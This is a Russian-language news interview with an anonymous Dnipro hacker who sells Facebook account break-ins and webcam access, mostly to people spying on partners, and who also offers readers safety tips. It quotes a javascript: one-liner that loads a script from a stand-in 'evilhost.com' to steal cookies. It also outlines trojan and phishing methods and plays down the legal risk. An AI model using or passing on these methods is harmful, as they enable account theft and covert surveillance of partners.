Хакер из Днепра рассказал, какие фатальные ошибки делают люди в соцсетях

Фото из фотобанка

Кто из нас не восхищался ими в кино? Смелые, чертовски умные парни, которые несмотря ни на что, могут обвести вокруг пальца абсолютно любого. Жизнь реальных хакеров сильно отличается от их прототипов на экране. Они умеют пользоваться "черным Google" и TOR, но не гнушаются заработком на взломе страничек в "Фейсбук". Герой этого материала пожелал остаться анонимным (что неудивительно), поэтому условно будем называть его Макс.

Макс – коренной днепрянин. В 2010-ом оставил работу в крупной IT-компании, когда понял, что на одном взломе социальных страниц можно зарабатывать не меньше и при этом быть хозяином своего времени. Парень рассказал Vgorode о том, что чаще всего просят взломать и сколько это стоит.


Подключиться к камере и взломать чужую страницу легко

С какими заданиями к тебе чаще всего обращаются?

Обычно просят сделать доступ к чужой камере на ноуте или взломать страницу в "Фейсбук". Парадокс нашего времени высоких технологий в том, что защитить вас от слежки по "вебке" может только лейкопластырь на камере.

Подключиться к камере на вашем ноуте можно как с помощью специальных программ, так и вручную. Для этого нужно создать исполняемый файл и "заразить" им компьютер. Это можно сделать, например, через безобидную на первый взгляд jpg-картинку. Информацию, как это сделать можно найти даже на форумах. Правда, большинство людей не знает, где ее искать и ведется на псевдообучающие видеоролики на ютюбе. Там показывают абсолютный бред. По ІР-адресу взломать "вебку" нельзя. Чтобы уберечь себя от слежки, не открывайте вложения к письмам и сообщениям, которые приходят от незнакомцев. "Троян" - по-прежнему самый распространенный способ залезть в чужой компьютер.

Взламывать чужие страницы в "Фейсбуке" можно, если заставить жертву перейти на фейковую страницу. Например, вы предлагаете ей вставить в поисковую строку определенный скрипт (программа, написанная на одном из языков программирования). Большинство людей ничего и не заподозрят. Это можно сделать даже со страницы заказчика, который является парнем/девушкой "жертвы".

Подобный скрипт может выглядеть вот так: javascript:var sc=document.createElement(‘script’);sc.src=’https://evilhost.com/scripts/evilscript.js?nz=’+Math.random();document.body.appendChild(s);void(0);

Пользователю можно сказать, что, перейдя по ссылке, он скачает классную песню. А в это время злоумышленник сможет проанализировать его файлы cookies.

Поэтому не введитесь на подобное. А если уж вы сами хотите кого-то взломать, ни в коем случае не нажимайте на ссылки в Интернете, по которым обещают чудодейственную программу. С vk.com не прокатывают "брут форсы" (спец.программы для взлома) с использованием утилит жесткого перебора паролей. Уже после третьей неудачной попытки включается "капча".  

Конечно, взлом влечет за собой уголовную ответственность, но еще не знаю никого, кто бы отлавливал хакеров за подобное. По сути, это мелочь на уровне государства. Никому нет до этого дела. Банки я не граблю.

Что нужно сделать, чтобы не попасть к взломщику на крючок?

Гарантий от взлома нет. Есть дельные советы: следите за адресом, на который переходите (если в адресной строке изменена хоть 1 буква – это наверняка ловушка), не открывайте непонятные файлы и не отвечайте на подозрительные письма. Пароли лучше выбирать  в виде бессмысленных наборов букв и цифр (не менее 8 знаков). Так вас не взломают "голыми руками". Есть специальные программы, которые генерируют всевозможные сочетания букв и цифр. Но если ими пользоваться, на взлом страницы уйдут годы.


Страницы взламывают для контроля вторых половинок

Сколько платят за взлом социальной страницы?

5-6 тысяч гривен. В месяц беру 2-3 заказа. Это стандартные расценки. Хотя если уже говорить откровенно, я не понимаю, зачем людям это нужно. Все хотят контролировать своих парней, девушек, жен, мужей… Но если человек активно с кем-то общается, это можно вычислить и без взломов. Разве нет? Кстати, последний год за подобной услугой обращается почти в два раза меньше людей. Наверное, кризис.

Как клиенты тебя находят?

Через форумы. В Интернете их много. Тем, кто решил воспользоваться "помощью извне", стоит быть очень осторожными. Кидают на форумах на раз-два. Лучше общаться только на проверенных сайтах. Нередко это бывают ничем не примечательные форумы с заголовками вроде "Программа по географии за 8 класс", "Вышивка крестиком для малышей" и т.д. Когда открываете такой сайт, вам бросается в глаза до ужаса банальная переписка на заданную тему, но стоит открыть кэшированную версию страницу и можно прочесть много интересного. Нередко на таких форумах используют шифр, но без ключа все диалоги выглядят как обмен множеством бессмысленных фраз. Чтобы попасть на такой сайт, нужен кто-то свой.

Не жалеешь, что ушел с постоянной работы ради нелегальной подработки?

Нет. Когда работаешь на крупную компанию 5 дней в неделю с 9 до 9, то времени жить вообще нет. Ты просто один из нескольких десятков роботов, которые кодят на большого дядю. Вот фриланс – это другое. Сегодня множество ребят проходят короткие курсы на тех же тестировщиков и горя не знают. Хотя создается впечатление, что скоро тестировщиков будет больше, чем программистов.


"Черный интернет" – это ад, который никто не в силах остановить

Сегодня много говорят о "черном Интернете". Что это? Он существует?

Да, он настолько же реален, как и обычная сеть.  Параллельный Интернет не видят поисковые системы Яндекс, Google и др. Доступ к множеству сайтов возможен только через цепочку зашифрованных соединений – TOR-сеть, узлы которой раскиданы по всему миру. Все соединения анонимны, проложить новый маршрут можно в любой момент. Про TOR говорят, что она состоит на 99% из троллей, хакеров, любителей детского порно и агентов ФБР.

Изначально это было что-то вроде закрытой сети для военных, но потом его каким-то образом "слили" и TOR облюбовали торговцы оружием, работорговцы и извращенцы. На самом деле в голове не укладывается, что буквально в клике от привычной нам "мировой паутины" процветает "ад", и никто не в состоянии его реально остановить. На сегодня эта "преисподняя" работает в основном на английском, но и наши соотечественники туда наведываются. 

Реальные хакеры похожи на тех ребят, что взламывают Пентагон в боевиках?

На экране хакеры больше бегают, чем реально кого-то взламывают. Если за тобой уже кто-то активно начал охоту, то скрыться, как фильмах, уже вряд ли получится. Это в представлении голливудских режиссеров у каждого хакера есть десяток друзей с автоматами и джипом, которые готовы умереть, лишь бы тебя не обидели. В реальной жизни играть с "большими дядями" опасно, гораздо безопаснее заниматься мелочью вроде взлома страниц в "Фейсбуке".

Кстати, о взломе Пентагона… СМИ любят писать о юных хакерах, взламывающих "такую серьезную систему". В результате оказывается, что юный гений всего лишь раздобыл список сотрудников Пентагона. Ребята, это может сделать любой с помощью поисковика, несмотря на то, что сайт защищен. По умолчанию слова и вообще любые введенные символы Google ищет по всем файлам на проиндексированных страницах. Ограничить область поиска можно по домену верхнего уровня, конкретному сайту или по месту расположения искомой последовательности в самих файлах. Вопрос всегда в том, представляют ли украденные данные хоть какую-то практическую ценность.

Какой совет дашь нашим читателям, чтобы избежать участи сайта Пентагона?

Поменьше выкладывайте личных данных. Я бы даже посоветовал не указывать семейное положение и возраст в соцсетях, не выгружать фото с любимыми. Также откажитесь от функции "указать местоположение" под фотографией. Конечно, это здорово, что вы поехали в Египет, но пока вы не дома, об этом знать никому не нужно.

Также лучше всего менять никнэймы на форумах и сайтах. К примеру, кто-то вычислит, что вы везде регистрируетесь под ником "любочка129", найдет форумы, где вы сидите и узнает, что вы недавно интересовались на каком-то портале, где дешевле купить угги. Достаточно написать вам на почту письмо от имени админа форума с просьбой ответить на какой-то безобидный вопрос ("Какие угги вас интересуют: серые или зеленые?") и получить ваши "куки" в ответе по имейлу. Таким образом, можно будет получить доступ  к вашему "ящику", а потом и к аккаунтам в соцсетях. В общем, береженого Бог бережет. 

Будьте в курсе последних новостей, подпишитесь на канал Vgorode в  и на наши группы в .

Последние новости